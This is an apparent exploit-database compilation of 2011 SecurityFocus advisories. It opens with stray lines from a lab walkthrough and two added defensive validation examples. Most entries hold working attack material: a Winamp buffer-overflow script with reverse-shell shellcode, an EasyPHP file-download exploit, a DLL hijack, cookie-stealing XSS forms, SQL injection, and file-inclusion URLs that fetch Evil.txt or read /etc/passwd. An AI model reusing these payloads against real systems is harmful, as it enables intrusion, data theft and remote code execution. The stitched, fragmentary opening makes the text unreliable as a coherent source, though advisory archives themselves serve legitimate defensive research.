Having read it, we simply submit the solution:

And in this way we complete the lab:

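The bypass the walkthrough above relies on is a server that tests only the text after the last dot of the raw filename while the filesystem layer stops at the first NUL. The following is an added example, not code from the original post or from PortSwigger: a weak check of that kind next to a strict one (NUL and control bytes rejected, no path components, whole-name allow-list, server-chosen stored name). The helper names are assumptions of this example.

```python
"""Upload-name validation for the null-byte / double-extension bypass the
lab above walks through.  Added example, not code from the original post
or from PortSwigger: weak_extension_check mirrors the kind of last-extension
test that bypass defeats; strict_upload_check shows the checks a server
should make before the name gets anywhere near the filesystem."""
import os
import re
import secrets
from typing import Optional, Tuple
from urllib.parse import unquote

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png"}

# Whole-name allow-list: one base name, one dot, one image extension.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpg|jpeg|png)$", re.IGNORECASE)


def weak_extension_check(filename: str) -> bool:
    """Looks only at the text after the last dot of the raw name.
    'readSecret.php%00.jpg' ends in 'jpg' and passes, even though the name
    the NUL-terminating layer ends up writing is readSecret.php."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXTENSIONS


def effective_name(filename: str) -> str:
    """Name a NUL-terminating layer (C runtime, older PHP) actually uses:
    percent-decode as the lab's server does, then stop at the first NUL."""
    return unquote(filename).split("\x00", 1)[0]


def strict_upload_check(filename: str) -> Tuple[bool, str]:
    """Returns (accepted, reason).  Control bytes and NUL are rejected
    outright, directory components are rejected, and the whole name must
    match the allow-list, so '.php' cannot hide anywhere inside it."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in filename):
        return False, "control or NUL byte in filename"
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename:
        return False, "path component in filename"
    if base.count(".") != 1:
        return False, "exactly one extension expected"
    if not _SAFE_NAME.match(base):
        return False, "name does not match allow-list pattern"
    return True, "ok"


def stored_name(filename: str) -> Optional[str]:
    """Server-chosen name for an accepted upload: random base plus the
    validated, lower-cased extension, so nothing user-controlled reaches
    the path.  Returns None when the upload is rejected."""
    accepted, _ = strict_upload_check(filename)
    if not accepted:
        return None
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(8)}.{ext}"
```

The strict check rejects the lab's name twice over: the raw NUL variant fails the control-byte test, and the percent-encoded variant fails the single-extension test before the allow-list is even consulted.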
source: https://www.securityfocus.com/bid/47369/info
PhpAlbum.net is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable process.
PhpAlbum.net 0.4.1-14_fix06 is vulnerable; other versions may also be affected.
http://www.example.com/main.php?cmd=setup&var1=user&var3=1-file_put_contents('./x.xxx','xxxx')
source: https://www.securityfocus.com/bid/47371/info
Agahi Advertisement CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Agahi Advertisement CMS 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/view_ad.php?id=-523+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
source: https://www.securityfocus.com/bid/47349/info
EC Software Help & Manual is prone to an arbitrary-code-execution vulnerability.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Help & Manual 5.5.1 Build 1296 is vulnerable; other versions may also be affected.
/*
Help & Manual Professional Edition 5.5.1 (ijl15.dll) DLL Hijacking Exploit
Vendor: EC Software GmbH
Product web page: http://www.helpandmanual.com
Affected version: 5.5.1 Build 1296
Summary: Help & Manual 5 is a single-source help authoring and content
management system for both single and multi-author editing.
Desc: Help & Manual suffers from a DLL hijacking vulnerability that enables
the attacker to execute arbitrary code on the affected machine. The vulnerable
extensions are hmxz, hmxp, hmskin, hmx, hm3, hpj, hlp and chm thru ijl15.dll
Intel's library.
Tested on: Microsoft Windows XP Professional SP3 EN
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Advisory ID: ZSL-2011-5009
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5009.php
06.04.2011
*/
#include <windows.h>

/* Forward declaration: the original called dll_mll() before it was
   declared, which is an implicit declaration and fails on modern compilers. */
static void dll_mll(void);

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    (void)hinstDLL;
    (void)lpvReserved;
    switch (fdwReason)
    {
    case DLL_PROCESS_ATTACH:
        dll_mll(); /* proof of load: fires when the host process maps the DLL */
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

/* void rather than int: the original declared int but returned nothing */
static void dll_mll(void)
{
    MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
source: https://www.securityfocus.com/bid/47342/info
TOTVS ERP Microsiga Protheus is prone to a denial-of-service vulnerability due to a memory-corruption issue.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Due to the nature of this issue, arbitrary code execution may be possible; however, this has not been confirmed.
--- CODE SNIPPET BEGIN ---
if options.target == 8:
    version = "20081215030344"
else:
    version = "20100812040605"
packet_handshake = (
    "%14s"
    "\x00\x01"
    "%36s\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "%32s\x00"
    "%s\x00"
    "\x00\x00\x14\x01"
) % ("A"*14, "B"*36, "C"*32, version)
packet_environ = (
    "\x42\x00\x00\x00\x21\xab\x42\x00\x00\x00"
    "\xff\xff\xff\xff"  # Memory Corruption (-1 as size)
    # "\x38\x00\x00\x00"  # OK (56 bytes)
    "\x01\x00\x3e\x82\x01\x03\x02\x04\x00\x00"
    "\x00\x00%7s\x00\x00\x00\x00\x00\x00"
    "%11s\x00\x00\x00\x00\x00\x00"
    "\x01\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00"
) % ("D"*7, "E"*11)
--- CODE SNIPPET END ---
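The snippet's comment pairs a size field of 0xffffffff (-1 when read as a signed int) with the 56-byte value that works, which is the whole bug: a negative size passes a signed "too big" test and then wraps. The following is an added example, not the vendor's code or the advisory's; it rebuilds the packet_environ frame from the snippet and shows the bounds check a decoder needs. The framing (10 fixed header bytes, a little-endian 32-bit size, then the payload) and the MAX_PAYLOAD ceiling are assumptions, inferred from the fact that the bytes after the size field total exactly 56.

```python
"""Bounds check for the length-prefixed frame in the snippet above.  Added
example, not the vendor's code or the advisory's.  Framing assumed from the
snippet: 10 fixed header bytes, a little-endian 32-bit size, then the
payload, whose bytes total exactly 56, the value the snippet marks as OK."""
import struct
from typing import Optional, Tuple

HEADER = b"\x42\x00\x00\x00\x21\xab\x42\x00\x00\x00"  # fixed bytes from the snippet
SIZE_OFF = len(HEADER)        # offset of the 4-byte size field
PAYLOAD_OFF = SIZE_OFF + 4    # first payload byte
MAX_PAYLOAD = 4096            # assumed ceiling; use the protocol's real maximum


def build_environ(size_field: bytes) -> bytes:
    """Rebuilds packet_environ from the snippet around the given size field."""
    payload = (
        b"\x01\x00\x3e\x82\x01\x03\x02\x04\x00\x00"
        + b"\x00\x00" + b"D" * 7 + b"\x00" * 6
        + b"E" * 11 + b"\x00" * 6
        + b"\x01\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00"
    )
    assert len(payload) == 56  # matches the snippet's "OK (56 bytes)" value
    return HEADER + size_field + payload


def signed_size(frame: bytes) -> int:
    """The size as a C 'int' would see it: 0xffffffff becomes -1, which
    slips past any 'size > MAX' test and wraps when used for allocation."""
    return struct.unpack_from("<i", frame, SIZE_OFF)[0]


def checked_payload(frame: bytes) -> Tuple[Optional[bytes], Optional[str]]:
    """Returns (payload, None) on success or (None, reason) on rejection.
    The size is read unsigned and compared against both a fixed ceiling and
    the bytes actually received before any slice or buffer is made."""
    if len(frame) < PAYLOAD_OFF:
        return None, "truncated before size field"
    size = struct.unpack_from("<I", frame, SIZE_OFF)[0]
    if size > MAX_PAYLOAD:
        return None, f"size {size:#x} exceeds ceiling"
    if size > len(frame) - PAYLOAD_OFF:
        return None, "declared size exceeds bytes received"
    return frame[PAYLOAD_OFF:PAYLOAD_OFF + size], None
```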
source: https://www.securityfocus.com/bid/47333/info
Winamp is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Winamp 5.6.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
###
# Title : Winamp 5.6.1 (.m3u8) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com || ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Stack Overflow
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
###
my $header = "#EXTM3U\n";
my $junk = "\x41" x 16240; # Buffer Junk
my $eip = "\xad\x86\x0e\x07"; # overwrite EIP - 070E86AD | FFD4 CALL ESP nde.dll
my $seh = pack('V',0x10017928); # add ESP,4404
$seh = $seh.pack('V',0x00000003); # Value de : EAX
$seh = $seh."\x41" x 11;
$seh = $seh.pack('V',0x41414141); # Value de : ECX
$seh = $seh."\x41" x 3;
$seh = $seh.pack('V',0x007EA478); # Value de : EDX
$seh = $seh."\x41" x 22;
$seh = $seh.pack('V',0x40000001); # Value de : EBX
$seh = $seh."\x41" x 8;
$seh = $seh.pack('V',0x028F1DB0); # Valeu de : ESP
$seh = $seh."\x41" x 12;
$seh = $seh.pack('V',0x77230459); # Valeu de : EBP
$seh = $seh."\x41" x 10;
$seh = $seh.pack('V',0x08FD62A8); # Valeu de : ESI
$seh = $seh."\x41" x 11;
$seh = $seh.pack('V',0x00497300); # Valeu de : EDI
$seh = $seh."\x41" x 2;
$seh = $seh.pack('V',0x08FD293C); # Valeu de : EIP
$seh = $seh."\x41" x 5;
my $nops = "\x90" x 100; # Nop
my $space = "\x41" x (43492 - length($junk) - length($nops));
my $shellcode = # windows/shell_reverse_tcp (http://www.metasploit.com)
"\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48" .
"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41" .
"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58" .
"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30" .
"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41" .
"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" .
"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d" .
"\x38\x4e\x69\x47\x70\x43\x30\x45\x50\x45\x30\x4d\x59\x4a" .
"\x45\x45\x61\x48\x52\x43\x54\x4e\x6b\x50\x52\x50\x30\x4c" .
"\x4b\x51\x42\x46\x6c\x4e\x6b\x46\x32\x46\x74\x4c\x4b\x50" .
"\x72\x46\x48\x46\x6f\x4f\x47\x43\x7a\x51\x36\x46\x51\x49" .
"\x6f\x46\x51\x4f\x30\x4e\x4c\x47\x4c\x43\x51\x43\x4c\x43" .
"\x32\x44\x6c\x47\x50\x4f\x31\x48\x4f\x46\x6d\x43\x31\x49" .
"\x57\x48\x62\x4c\x30\x51\x42\x42\x77\x4c\x4b\x50\x52\x42" .
"\x30\x4c\x4b\x43\x72\x45\x6c\x46\x61\x4a\x70\x4c\x4b\x43" .
"\x70\x43\x48\x4e\x65\x4b\x70\x42\x54\x50\x4a\x45\x51\x48" .
"\x50\x46\x30\x4e\x6b\x50\x48\x45\x48\x4e\x6b\x51\x48\x51" .
"\x30\x45\x51\x48\x53\x48\x63\x47\x4c\x43\x79\x4e\x6b\x47" .
"\x44\x4e\x6b\x46\x61\x4b\x66\x50\x31\x4b\x4f\x44\x71\x4f" .
"\x30\x4e\x4c\x49\x51\x4a\x6f\x46\x6d\x46\x61\x4f\x37\x46" .
"\x58\x4d\x30\x42\x55\x4a\x54\x46\x63\x43\x4d\x4c\x38\x47" .
"\x4b\x51\x6d\x44\x64\x44\x35\x49\x72\x43\x68\x4c\x4b\x50" .
"\x58\x45\x74\x47\x71\x48\x53\x51\x76\x4e\x6b\x46\x6c\x42" .
"\x6b\x4c\x4b\x42\x78\x47\x6c\x45\x51\x48\x53\x4e\x6b\x45" .
"\x54\x4c\x4b\x47\x71\x48\x50\x4f\x79\x42\x64\x44\x64\x47" .
"\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x43\x6a\x46\x31\x4b" .
"\x4f\x4d\x30\x50\x58\x43\x6f\x43\x6a\x4c\x4b\x45\x42\x48" .
"\x6b\x4e\x66\x43\x6d\x42\x48\x50\x33\x44\x72\x45\x50\x43" .
"\x30\x51\x78\x42\x57\x42\x53\x46\x52\x43\x6f\x50\x54\x43" .
"\x58\x42\x6c\x44\x37\x44\x66\x45\x57\x49\x6f\x48\x55\x48" .
"\x38\x4c\x50\x47\x71\x45\x50\x47\x70\x47\x59\x4b\x74\x51" .
"\x44\x42\x70\x42\x48\x44\x69\x4d\x50\x42\x4b\x43\x30\x49" .
"\x6f\x48\x55\x50\x50\x42\x70\x50\x50\x42\x70\x47\x30\x42" .
"\x70\x43\x70\x50\x50\x43\x58\x48\x6a\x44\x4f\x49\x4f\x4d" .
"\x30\x49\x6f\x4b\x65\x4e\x69\x48\x47\x42\x48\x43\x4f\x45" .
"\x50\x43\x30\x47\x71\x43\x58\x43\x32\x45\x50\x44\x51\x43" .
"\x6c\x4e\x69\x4a\x46\x51\x7a\x42\x30\x51\x46\x43\x67\x42" .
"\x48\x4d\x49\x4e\x45\x51\x64\x51\x71\x49\x6f\x4e\x35\x50" .
"\x68\x42\x43\x42\x4d\x42\x44\x47\x70\x4c\x49\x48\x63\x51" .
"\x47\x51\x47\x51\x47\x50\x31\x4b\x46\x51\x7a\x47\x62\x51" .
"\x49\x50\x56\x4d\x32\x49\x6d\x50\x66\x4f\x37\x42\x64\x46" .
"\x44\x45\x6c\x47\x71\x43\x31\x4c\x4d\x50\x44\x51\x34\x42" .
"\x30\x4a\x66\x43\x30\x43\x74\x50\x54\x42\x70\x43\x66\x43" .
"\x66\x51\x46\x47\x36\x46\x36\x42\x6e\x50\x56\x46\x36\x42" .
"\x73\x43\x66\x50\x68\x44\x39\x48\x4c\x47\x4f\x4b\x36\x4b" .
"\x4f\x48\x55\x4c\x49\x4b\x50\x50\x4e\x42\x76\x43\x76\x49" .
"\x6f\x50\x30\x42\x48\x43\x38\x4c\x47\x47\x6d\x43\x50\x49" .
"\x6f\x4e\x35\x4f\x4b\x4a\x50\x4d\x65\x4d\x72\x51\x46\x51" .
"\x78\x4d\x76\x4e\x75\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47" .
"\x4c\x46\x66\x43\x4c\x45\x5a\x4b\x30\x49\x6b\x49\x70\x43" .
"\x45\x45\x55\x4d\x6b\x51\x57\x44\x53\x43\x42\x42\x4f\x51" .
"\x7a\x47\x70\x46\x33\x4b\x4f\x49\x45\x41\x41";
my $end = "\x90" x (20000 - length($nops)); # Nop sled (original subtracted the string itself, not its length)
open(FILE, '>', 'KedAns.m3u8') or die "cannot open KedAns.m3u8: $!"; # overwrite, so re-runs do not append a second copy
print FILE $header.$junk.$space.$seh.$nops.$eip.$shellcode.$end;
close(FILE);
source: https://www.securityfocus.com/bid/47332/info
Website Baker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Website Baker 2.8.1 is vulnerable; other versions may also be affected.
POST /admin/users/add.php HTTP/1.1
user_id=&username_fieldname=username_1hnuvyv2&username_1hnuvyv2=test&password=password&password2=password&display_name=test&email=test%40test.com&home_folder=123'SQL_CODE&groups%5B%5D=123'SQL_CODE&active%5B%5D=1&submit=Add
POST /admin/groups/add.php HTTP/1.1
advanced=no&group_id=&group_name=123%27SQL_CODE_HERE&module_permissions%5B%5D=code&module_permissions%5B%5D=form&module_permissions%5B%5D=menu_link&module_permissions%5B%5D=news&module_permissions%5B%5D=wrapper&module_permissions%5B%5D=wysiwyg&template_permissions%5B%5D=allcss&template_permissions%5B%5D=argos_theme&template_permissions%5B%5D=blank&template_permissions%5B%5D=classic_theme&template_permissions%5B%5D=round&template_permissions%5B%5D=simple&template_permissions%5B%5D=wb_theme&submit=Add
source: https://www.securityfocus.com/bid/47329/info
Plogger is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Plogger 1.0 Rc1 is vulnerable; other versions may also be affected.
<form action="http://host/plog-admin/plog-options.php" method="post">
<input type="hidden" name="gallery_name" value='my gallery"><script>alert(document.cookie)</script>'>
<input type="hidden" name="gallery_url" value="http://host/">
<input type="hidden" name="admin_username" value="Ildar">
<input type="hidden" name="admin_email" value="valeevildar@ya.ru">
<input type="hidden" name="admin_password" value="">
<input type="hidden" name="confirm_admin_password" value="">
<input type="submit" id="btn" name="submit" value="Update Options">
</form>
<script>
document.getElementById('btn').click();
</script>
source: https://www.securityfocus.com/bid/47320/info
The Gazette Edition for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.
Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.
Gazette Edition for Wordpress 2.9.4 and prior versions are vulnerable.
http://www.example.com/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E
http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site
http://www.example.com/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1
source: https://www.securityfocus.com/bid/47317/info
The Spellchecker plugin for WordPress is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
Spellchecker 3.1 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/general.php?file=http://sitename.com/Evil.txt?
http://www.example.com/general.php?file=../../../../../../../etc/passwd
source: https://www.securityfocus.com/bid/47310/info
MIT Kerberos is prone to a remote code-execution vulnerability in 'kadmind'.
An attacker may exploit this issue to execute arbitrary code with superuser privileges. Failed attempts will cause the affected application to crash, denying service to legitimate users. A successful exploit will completely compromise affected computers.
MIT Kerberos 5 1.7 and later are vulnerable.
NOTE (April 13, 2011): This BID was originally titled 'MIT Kerberos kadmind Version String Processing Remote Denial Of Service Vulnerability', but has been renamed to better reflect the nature of the issue.
# nmap -n -sV krb01
source: https://www.securityfocus.com/bid/47145/info
EasyPHP is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
EasyPHP 5.3.5.0 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# ********* In The name of Allah ************
###
# Title : EasyPHP Web Server 5.3.5.0 Remote File Download Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote Content/Download File
# Tested on : Windows XP SP3 Français
# Target : EasyPHP 5.3.5.0
###
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
# ------------
# EasyPHP Web Server is vulnerable to a Remote File Download attack; the following code will exploit the bug.
# The vulnerability allows an unprivileged attacker to download files for which he has no permissions.
# ------------
# ********* In The name of Allah ************
system("title KedAns-Dz");
system("color 1e");
system("cls");
sleep(1);
# Start Exploit : ** Allah Akbar **
use LWP::Simple;
if (@ARGV < 3) {
print("\r\n");
print("=================================================================\r\n");
print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");
print("=================================================================\r\n");
print(" [!] Usage: " .$0. " <host> <port> <file>\r\n");
print(" [!] HOST - An host using EasyPHP Web Server\r\n");
print(" [!] PORT - Port number\r\n");
print(" [!] FILE - The file you want to get\r\n");
print(" [!] Example: " .$0. " targetserver.com 80 index.php\r\n");
print("=================================================================\r\n\r\n");
sleep(1);
exit(1);
# ** Allah Akbar **
} else {
print("=================================================================\n");
print(" [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
print(" [*] Discovered & Exploited by : KedAns-Dz\r\n");
print("=================================================================\r\n\r\n");
sleep(2);
($host, $port, $file) = @ARGV;
$content = get("http://" .$host. ":" .$port. "/" .$file. ".");
print(" [+] File Content:\r\n\r\n");
sleep(2);
print($content. "\r\n");
open (KDZ ,">","KedAns.log");
print KDZ "Log File Exploited By KedAns-Dz <ked-h(at)hotmail(dot)com>\r\n" .
"Greets All Hackers Moslems & All My Friends \r\n" .
"Target : http://$host:$port/$file \r\n" .
"File Content : \n\n" .
"=============================\r\n\n" .
"$content";
print("\r\n");
print("=================================================================\n");
print "\n[+++] Creating And Download the Target File Content in KedAns.log \n";
}
# ** In The Peace of Allah **
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
source: https://www.securityfocus.com/bid/47150/info
DoceboLMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
DoceboLMS 4.0.4 is vulnerable; other versions may also be affected.
<html>
<title>DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script>
<br /><br />
<form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=preassessment&op=modassessment" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
<input type="hidden" name="code" value='"><script>alert(1)</script>' />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="id_assess" value="0" />
<input type="hidden" name="name" value='"><script>alert(2)</script>' />
<input type="hidden" name="save" value="Save changes" /></form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit PreAssessment Module!</h3></center></font></b></a><br /><br />
<form action="http://www.example.com/DoceboLMS_404/doceboCore/index.php?modname=news&op=savenews" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="authentic_request" value="23dfee506a748201730ab2bb7486e77a" />
<input type="hidden" name="language" value="2" />
<input type="hidden" name="long_desc" value="" />
<input type="hidden" name="news" value="Insert" />
<input type="hidden" name="short_desc" value="ZSL" />
<input type="hidden" name="title" value='"><script>alert(1)</script>' /></form>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit News Module!</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/index.php?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #1</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #2</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/docebolms/index.php/index.php?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #3</h3></center></font></b></a><br /><br />
<a href="http://www.example.com/DoceboLMS_404/docebolms/?<script>alert(1)</script>" style="text-decoration:none">
<b><font color="red"><center><h3>Exploit URI XSS #4</h3></center></font></b></a><br /><br />
</body></html>
source: https://www.securityfocus.com/bid/47157/info
Anantasoft Gazelle CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Anantasoft Gazelle CMS 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/search.php?lookup=<script>alert(888)</script>
http://www.example.com//register.php?^name=&pass=&controle=&email=&showemail=&save=Save&table=users&active=0&activate=3fb04953d95a94367bb133f862402bce&location=%2FAnanta_Gazelle1.0%2Fregister.php&joindate=2011-04-05+07%3A58%3A50 [is vulnerable to ' input SQL inject]
source: https://www.securityfocus.com/bid/47142/info
The Placester WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Placester 0.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/placester/admin/support_ajax.php?ajax_action=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
source: https://www.securityfocus.com/bid/47133/info
GameHouse 'InstallerDlg.dll' ActiveX control is prone to multiple vulnerabilities.
Successfully exploiting these issues allows the attacker to execute arbitrary commands within the context of the application (typically, Internet Explorer) that uses the ActiveX control, and allows remote attackers to create or overwrite arbitrary local files and to execute arbitrary code. Failed exploit attempts will result in a denial-of-service condition.
InstallerDlg.dll 2.6.0.445 is vulnerable; other versions may also be affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-2.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35560-3.rb
source: https://www.securityfocus.com/bid/47131/info
MyBB is prone to multiple security vulnerabilities. These vulnerabilities include a username-enumeration weakness, an XML-injection vulnerability, and a cross-site scripting vulnerability.
Exploiting these issues may allow attackers to discern valid usernames, which may aid them in brute-force password cracking or other attacks. Attacker-supplied XML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user.
Versions prior to 1.6.2 and 1.4.15 are vulnerable.
XML-injection:
http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cxml/%3E
XSS:
http://www.example.com/xmlhttp.php?action=username_exists&value=%3Cdiv%20xmlns=%22http://www.w3.org/1999/xhtml%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C/div%3E